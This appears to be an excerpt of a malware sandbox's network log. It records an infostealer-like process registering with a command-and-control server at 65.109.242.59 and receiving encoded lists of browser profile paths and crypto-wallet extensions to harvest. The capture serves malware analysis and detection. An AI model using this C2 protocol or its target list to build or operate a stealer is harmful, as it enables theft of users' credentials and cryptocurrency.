2024-05-26 08:31:03 UTC	15331	OUT	Data Raw: 5f 23 45 f0 93 f6 33 77 61 5b 55 86 37 ee b6 24 50 d2 db fc 95 07 a8 93 ef 3f 6a 94 17 ce db ff d0 59 c9 12 ad bc ba 2e 83 82 c5 d8 43 e5 6f aa 34 71 2c f6 ef 5c d6 6f e1 ea 6f c5 fd 41 78 0c 97 29 bc 03 0b 9b 07 82 3d 07 99 ae 1d 32 de ff 6f c9 89 0e 0e d6 3a 01 31 b3 bd d8 29 4e e2 2c 76 6e 45 5f a4 f1 a3 d0 90 16 3b ba fe 66 9b 90 15 2b 57 2f 5f fb fe 96 38 38 4d c9 fe bf 59 97 42 c0 7c 53 98 e1 05 18 32 98 b1 3b 44 90 37 04 34 a1 16 d5 59 2d 2b 12 1b cf df d0 3a a2 c2 70 5a e2 35 dd c2 f7 d0 7b b6 61 45 24 81 5a 64 f8 57 90 e1 bf 8e 98 61 c0 bb 5f 25 51 f2 30 ac 7b f0 67 b4 3c c2 6d f1 87 17 9d e4 d1 17 4a 9c 5a 64 7b 72 66 d1 f3 d4 78 68 e2 a3 b2 37 67 6e cb 7b 1f bd 75 24 d1 78 14 df e9 fe 01 ea 10 c9 f1 71 10 02 fe e3 e9 8e ee 27 34 4f 1c 67 f2 3b Data Ascii: _#E3wa[U7$P?jY.Co4q,\ooAx)=2o:1)N,vnE_;f+W/_88MYB\|S2;D74Y-+:pZ5{aE$ZdWa_%Q0{g<mJZd{rfxh7gn{u$xq'4Og;
2024-05-26 08:31:03 UTC	15331	OUT	Data Raw: bb 4c 9b 4e 93 68 77 f8 07 62 bc d9 22 51 12 50 20 d6 68 e2 40 b2 fa 7c 8d 30 bf ca fb 76 e9 fc ff db d3 29 13 0b 4f a4 11 01 e7 3a b4 e2 2f bf 86 50 d7 6d 66 10 78 71 07 14 6c 82 82 85 d9 6e 84 ba e0 21 5a e1 f6 a4 ff d7 87 14 9e 88 27 5d 40 58 07 12 21 dc f5 bd b7 25 0e 44 f1 32 f7 21 6a 74 68 d0 bd 18 1f dc 38 ac 11 5c 13 9a 38 2f 74 80 21 5c bd 17 cc 36 db 87 14 f7 64 59 7d 77 ee 9a de 5e 7f 6a 3b 03 c1 c9 78 97 9d 71 e2 36 1f e7 5c d3 e8 20 e4 a2 78 9d 00 2d ef 1b e4 a6 82 f8 f8 ce 4a 19 2d 9b 42 6f 6b 62 79 a7 4f a5 21 72 55 77 b0 c6 25 62 4b 09 03 ab 6d d0 a6 cc d5 44 ed f7 08 be 4b a8 b6 f8 66 9e 15 ec cd 83 e6 c5 26 57 5d 7d a1 29 cc 39 f3 0c 75 20 c8 36 6a 70 f9 8c 4b a3 ab 71 98 6a 8c 64 19 91 57 47 13 17 9d cc e0 a0 d3 9a 78 9f 78 96 a5 6a 55 Data Ascii: LNhwb"QP h@\|0v)O:/Pmfxqln!Z']@X!%D2!jth8\8/t!\6dY}w^j;xq6\ x-J-BokbyO!rUw%bKmDKf&W]})9u 6jpKqjdWGxxjU
2024-05-26 08:31:03 UTC	15331	OUT	Data Raw: ab 4e 4a ed d2 63 3d 07 c5 cb e7 8e c0 10 27 54 aa 59 ac ec 5c 6f 56 26 f2 ee a8 b3 8a 4b fa 11 5b d3 17 c2 23 81 9d 3a 00 f6 dc a7 c8 e7 e2 0d f8 b5 19 c7 52 b5 53 8d fb 7e 74 dc 0f 3e f8 af 45 bd b1 cb 9b f0 ac 65 63 83 e6 5d 55 59 0f 2b 91 a3 3b 85 9b 70 e7 9c 64 2e ab ec 29 f2 d5 29 ac d5 00 b4 2f b5 8b f7 da 45 da c8 f8 87 30 dd 5e 2b f6 55 73 d8 46 93 9c 63 74 3b a5 a9 08 2a 42 39 e9 db 53 ab 8c 2a c8 c1 5b c3 35 1d 91 62 87 04 95 cf 18 e3 47 c7 24 50 08 04 5c a0 66 db 82 2c 8d fd 86 85 69 ef f1 59 cb ce b0 4b 43 7e 7c f5 49 54 22 a3 96 fd f3 43 01 d2 7f 46 84 99 0f ce ed ce 62 04 2c 4c 71 44 d5 a5 cf 39 2f 1e 9c 18 79 bd 53 e4 c7 bf 23 81 d3 2f 5f 6f c7 12 85 4f 12 79 ef ea 9e c8 8c fd 2e 7a e5 fd c9 fe fd c8 bd cc 2c 5f b8 e6 c6 0d da 63 fa c6 84 Data Ascii: NJc='TY\oV&K[#:RS~t>Eec]UY+;pd.))/E0^+UsFct;B9S[5bG$P\f,iYKC~\|IT"CFb,LqD9/yS#/_oOy.z,_c
2024-05-26 08:31:03 UTC	15331	OUT	Data Raw: 66 e3 7c 0f 02 62 4e 89 76 ee 13 19 02 f6 14 c8 db 21 1c ad 5a fc e9 8c e3 40 34 72 39 79 a1 ce 48 d9 f7 ff ae dd ff f3 12 27 04 d3 46 48 04 09 da d7 30 c5 46 70 70 2a c0 25 67 ef 75 db bf b3 e3 f0 89 48 24 f7 78 fa ea 61 6b 60 17 e1 86 01 88 35 b1 8d 98 1e 0c 28 45 97 e7 11 a2 b5 53 be bb fe 1a 6f 6b ec 4f de ad c3 d7 f1 e5 df d1 0c ab 30 4b 60 07 b9 c8 02 e1 6f a2 dd c1 ef bc 41 61 46 75 fb 43 6a e7 36 9b ec dc 6f 9f 40 80 4a 6b ee 3d d7 39 f1 89 20 5f 29 60 37 85 fa 73 d7 93 c7 69 1c d8 29 72 17 73 7d ff 20 aa 2d d8 57 0c ec 5c ee aa f8 fb cc 19 2b d9 bb 46 0a fe 83 df 0c 37 cd f7 44 12 bc 05 5e 75 0f 5b 77 5a 43 7f 7e 26 9d 9b 79 a1 51 27 08 95 7e eb ad 27 50 4d 84 98 dd bb f2 4a 78 01 1a 3a f6 da 81 f3 57 9f 6b 45 28 ed a8 31 1a 3c 51 a7 d4 bb 56 8d Data Ascii: f\|bNv!Z@4r9yH'FH0Fpp*%guH$xak`5(ESokO0K`oAaFuCj6o@Jk=9 _)`7si)rs} -W\+F7D^u[wZC~&yQ'~'PMJx:WkE(1<QV
2024-05-26 08:31:03 UTC	15331	OUT	Data Raw: 0b 16 90 cc a8 d0 22 61 09 20 8e b0 75 49 8d db 7e 70 bd fc c3 27 ac 46 65 75 f0 33 5a 1e 76 af 37 c2 f0 d2 24 e8 68 c8 7d 9a cc 73 d9 60 b2 9c 57 9f 6f 24 20 8c ec d8 e9 4b c3 7b e5 92 92 39 19 8b a2 62 cc 37 2a 37 42 df b1 be d6 30 96 3a 38 f5 2c f5 09 68 74 08 16 a9 2b 97 eb f1 2d 1f e4 61 aa fc f6 bc 91 34 0d 87 9a 3e 0b 77 e8 1a fd c8 10 81 2d 6d 7c 2b dc 7b 8b 99 17 0e 6b 16 70 24 c1 31 e9 b3 2e 84 71 60 9c c3 0e b7 6c 05 06 86 ed 83 19 1b a5 2e ce 55 eb 7a b1 ec 7b 8e 4e ae 27 09 29 52 b8 be cc dc 94 82 9d 9b 7b 32 73 0c d5 84 f9 21 d2 d3 67 7f a9 b0 b2 04 40 90 85 0c 01 22 d0 c9 8e c1 ea ce 65 21 22 9f 31 12 a8 65 77 57 6e 2a a5 fe 59 08 39 b9 80 db 97 44 45 c5 22 d6 55 27 91 cc 02 1f 8e fb 9b ee 3a aa 09 4e 23 17 5b 5b e1 ac e0 2b 00 e9 44 a9 5f Data Ascii: "a uI~p'Feu3Zv7$h}s`Wo$ K{9b77B0:8,ht+-a4>w-m\|+{kp$1.q`l.Uz{N')R{2s!g@"e!"1ewWnY9DE"U':N#[[+D_
2024-05-26 08:31:03 UTC	15331	OUT	Data Raw: 92 c0 2c 0c 5d 53 0c dc 1b c2 a7 c3 1e bc 96 fa 05 26 55 2f 46 c1 af b2 6e de 62 94 83 f1 c7 79 f2 15 be 3b 0e eb 1f ff e0 a3 c9 25 7f 06 09 87 10 b4 af 9c 82 3b 4d c3 73 97 ab 4e 64 f5 85 29 a8 0d fc dd 30 98 d1 12 73 9d 51 1c e8 d4 61 f3 89 78 e7 48 5c fa f0 a7 8d be e3 4a 59 bb 16 b4 46 7d 9c 63 d6 4b 76 3f c9 b7 2b d6 39 31 51 f5 f7 43 ce 63 85 9d 2b f0 d4 80 3b 65 e1 5c c6 45 92 eb 25 13 76 31 72 4d 08 54 6d df 79 f5 3f 5b 91 70 06 36 03 07 d0 70 1f 4d 9c 60 1f be 07 a4 e9 0c 4b 76 f1 9f 82 3b d7 fb 8a 30 62 6b a1 06 1b 98 1e f5 05 e6 a1 69 ca 3b bd 74 fc 29 ed 12 44 51 c6 a4 c5 b1 ef 33 9f 23 48 0d 3a 42 e8 d6 db 12 8b b3 16 c4 71 c9 7f c7 32 d4 18 ca 18 42 d5 d7 20 ba bd 99 b3 d7 5c e1 a9 b5 76 fc 32 48 68 36 44 10 b5 b7 b1 d0 5c 13 51 8d 8d fd c1 Data Ascii: ,]S&U/Fnby;%;MsNd)0sQaxH\JYF}cKv?+91QCc+;e\E%v1rMTmy?[p6pM`Kv;0bki;t)DQ3#H:Bq2B \v2Hh6D\Q
2024-05-26 08:31:03 UTC	15331	OUT	Data Raw: 1b 19 28 d1 42 e2 7e 99 4d 4b a4 3f b2 79 63 ae 6f 55 f4 95 3c 68 84 0a 57 95 a9 48 6f 73 75 75 42 84 b8 9a ea a5 0b cf 7c 33 13 90 40 87 a1 ab 2f 94 0f 8e 95 7f 40 22 2e 7f 9f db 50 16 79 68 2f e2 da e9 3a ee ce 7a 72 d5 17 3d a3 42 b9 17 3a 52 51 fa 6d 93 7c 15 41 d9 68 21 97 d8 26 72 5b 54 e8 65 d6 cc 01 96 1a cd 9f 17 1e d2 2e 63 76 14 71 38 a1 24 d8 7d 54 4e 0b 55 2d b1 6e 17 68 ac 9b 0e ef 75 db 4f 72 07 36 e4 70 b3 54 e3 23 10 14 1e cd 2a bc 03 e2 16 bf 50 4b 67 f3 b2 dc 9e fc 2b 70 4b 43 b4 e4 fa 4f 08 82 97 10 65 b4 8d 29 3d 3a 47 26 67 ed 02 06 1a 7c e4 b7 9e 51 5c 83 18 de 83 26 fa 51 e1 5b ba 2f d9 ce 7d 47 c4 2d 8c 5b 66 ef 5c 6a f4 fb 49 77 a5 1a 39 6e 89 27 0a 08 43 e4 19 5e ea 8a 69 44 c2 40 f4 a2 cf 8b 25 d3 b7 50 06 7f 9e 64 10 71 67 ee Data Ascii: (B~MK?ycoU<hWHosuuB\|3@/@".Pyh/:zr=B:RQm\|Ah!&r[Te.cvq8$}TNU-nhuOr6pT#*PKg+pKCOe)=:G&g\|Q\&Q[/}G-[f\jIw9n'C^iD@%Pdqg
2024-05-26 08:31:03 UTC	15331	OUT	Data Raw: 46 81 ed 1a 1a 1d fa 48 b4 a7 ed 46 b6 34 23 8b bd 79 4a 91 57 3d af 6b bf 74 01 de ae b4 7b a6 e7 9c fb ba 08 e4 7a ea 9d ad 40 7c 65 66 a3 79 75 6b f4 5f 5a 32 00 47 25 c2 c5 cc 06 1e 0b fd 7d 0d 22 ee 56 bc 0d 1c 92 37 ad 96 9a 02 c3 b2 94 61 5b 0a 14 4a a0 a9 c7 d2 eb ac ed 5d 1a 62 76 a3 66 76 42 22 28 eb b0 57 92 7c ff 69 40 39 c0 63 88 d1 61 62 62 9a 35 94 20 af f5 f3 8c ac 15 ee bc 00 ac a1 14 2d 8e 19 34 44 40 9c 7d 12 19 9b cf c8 71 e2 2f 14 28 fb fe 6c e3 7a 3f 7e 66 9c 6e f0 6a 4d 5f 8f 2f 34 1a 32 93 6c b5 5c 3a 62 b3 05 e1 4e ec 69 16 1c c6 09 8d ee d5 17 fb a0 1c 95 08 57 b8 7c bc 59 f2 01 58 47 1f 39 8e 0b 9b 7f 54 d6 96 60 50 d0 0a 75 6d 68 99 ab ff 2c e6 26 6d df 88 5a bd 64 fe 67 f1 1c 6f d4 e0 4e 2f 9c 97 fd db f5 58 d4 5e 0b 02 c5 e2 Data Ascii: FHF4#yJW=kt{z@\|efyuk_Z2G%}"V7a[J]bvfvB"(W\|i@9cabb5 -4D@}q/(lz?~fnjM_/42l\:bNiW\|YXG9T`Pumh,&mZdgoN/X^
2024-05-26 08:31:03 UTC	15331	OUT	Data Raw: 44 e2 91 52 f9 d4 cc 89 56 52 9d 11 c9 c4 60 93 ad 25 1e 26 78 f3 a6 6b ee 95 d1 94 b6 cb 17 a5 98 f9 be 31 f0 80 f8 b6 c8 2d 37 0d 2a 7d b7 53 38 04 fb e3 10 1d e6 b5 3c fc f2 f5 2d 0c 3c ee 5f 41 c2 10 e7 af b3 64 29 8b 75 3a f3 c3 18 56 9c 32 c8 72 25 fe 71 c3 ae 81 65 0c 9c 0f 40 48 68 53 35 77 24 3e 60 76 2d 8f b4 f0 ed 9c c8 6d 63 0c ab 87 65 f5 09 df ed 73 57 c7 c4 1c 38 98 7f d6 15 0f 9b 4c 27 de d9 da f8 83 45 cf 01 48 b1 7c 63 ff 86 a7 72 ed 59 b6 5b b3 e9 24 78 59 6f db 4c cc 55 4e f2 4e da c4 20 67 c2 ea a5 83 13 e3 a8 1d ab e7 c6 68 ce 22 20 2f 01 86 48 1f 07 bd 4d 26 6b 61 42 0b 11 99 e8 30 7e 00 ad b0 8c 12 1d 94 d9 23 06 79 8a 75 95 b5 00 ae 58 85 c2 75 fa b9 88 81 ab d6 dd ad dc a2 63 74 ff 0d 1f e3 a1 4c 73 fd 28 03 33 d2 e5 1e d3 56 1e Data Ascii: DRVR`%&xk1-7*}S8<-<_Ad)u:V2r%qe@HhS5w$>`v-mcesW8L'EH\|crY[$xYoLUNN gh" /HM&kaB0~#yuXuctLs(3V
2024-05-26 08:31:05 UTC	816	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 08:31:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=prci11ra0p54p571d1kr5iceaa; expires=Thu, 19-Sep-2024 02:17:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Ja3X33Uiu275rVgAy%2B9bitbKETF4UM69n0YIL21b7TWONfGsFoyfE3m5mMOn24d9Y%2FWDRdeZ3Xi2R1%2ByPuyYb7hV56aQ4%2BgX7dpY%2BXI%2FcIxGkipM4tHkTK7dcmluIOXuoPACuqVMQfzLC0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 889c681eafba8cc8-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49739	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:04 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:04 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 31 31 32 36 45 30 44 36 34 46 34 30 33 33 30 36 30 30 37 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="hwid"B11126E0D64F4033060071-a33c7340-61ca-11ee-8c18-806e6f6e6963------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------
2024-05-26 08:31:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:05 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|057d27820b079cba3dfaacc8dcb4aaf0\|1\|1\|1\|1\|1\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49740	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:06 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:06 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------BAFCGIJDAFBKFIECBGCACont
2024-05-26 08:31:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:06 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49741	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:07 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:07 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CFCBFBGDBKJKECAAKKFHCont
2024-05-26 08:31:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:08 UTC	5605	IN	Data Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49745	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:09 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:09 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CAKEBFCFIJJKKECAKJEHCont
2024-05-26 08:31:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:10 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49746	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:10 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 5557 Connection: Keep-Alive Cache-Control: no-cache
